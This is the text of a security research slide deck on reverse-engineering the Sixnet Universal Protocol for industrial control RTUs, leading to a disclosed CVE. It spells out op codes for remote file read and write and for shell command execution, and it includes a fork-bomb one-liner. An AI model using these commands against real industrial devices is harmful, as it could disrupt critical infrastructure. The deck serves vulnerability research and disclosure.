Post on 14-Jan-2016
Sixnet Tools presentation• Slight overview of ICS environment• The Sixnet Universal Protocol• Fun stuff to do with it
•Some
• NextGen Firewalls• Advanced Persistent Threat• Cloud• IPS/IDS 2.0• MDM• SaaS• IaaS• Google
About Me
• Doctoral Student• Graduate Research Assistant at UofL• Intelligent Systems Research Lab• Bourbon Enthusiast
Sixnet ToolsFor Poking at Sixnet Things
ICS
Control
Industrial
System
Control
Supervisory
SCADA Networks
AndDataAcquisiti
on
Sixnet I/O ToolkitHMI
Human
Machine
Interface
RTU
Remote Terminal Unit
Operator on HMI
RTU
Substation
Modbus op codes
Function type Function name Function code
Data Access
Bit access
Physical Discrete Inputs Read Discrete Inputs 2
Internal Bits or Physical Coils
Read Coils 1Write Single Coil 5
Write Multiple Coils 15
16-bit access
Physical Input Registers Read Input Register 4
Internal Registers or Physical Output Registers
Read Holding Registers 3
Write Single Register 6
Write Multiple Registers 16
Read/Write Multiple Registers
23
Mask Write Register 22
Read FIFO Queue 24
File Record AccessRead File Record 20
Write File Record 21
Diagnostics
Read Exception Status 7
Diagnostic 8
Get Com Event Counter 11
Get Com Event Log 12
Report Slave ID 17
Read Device Identification 43
OtherEncapsulated Interface Transport
43
Modbus Protocol
• Address 2
• Op code 2
• Data n
• Checksum 2
Problem?
Sixnet Universal Protocol
• Lead 1• Length 1• Destination 1• Source 1• Session 1• Sequence 1• Op Code 1• Data n• CRC 2
Reversing
Blinkenlights
Telnet, FTP
Telnet, FTP
Get File Descriptor
• Op Code 1a• Data 00:03:00:[file path]:00 (read)
03:03:[4-byte file size]:[file path]:00 (write)
Get File Descriptor
• Op Code 01• Data [FD]
File manipulation
• Op Code 1a• Data 06:[FD] (read)
02:[FD]:[4B start]:[2B length]:[data] (write)
File manipulation
• Op Code 01• Data [FD]:[start]:[length]:[data] (read)
00:[FD] (write)
MORE SNIFFING!
Shell Commands
• Op Code d0• Data 1e:01:00:[command]:00
• Op Code 01• Data 00:[length]:[output]
Pseudo-Shell
Furk Bamp
BOOM!BOOM!
BOOM!
p(){ p|p& }; p
QUESTIONS?
Reporting
CVE-2013-2802
Sixnet firmware 4.8
• Read coils•Write coils• Read file system•Write file system•Administrative access to the OS
QUESTIONS?
Intelligent Systems Research LabUniversity of Louisvillehttps://code.google.com/p/my-sixnet-tools/
Mehdi SabraouiSabraoui.m@gmail.com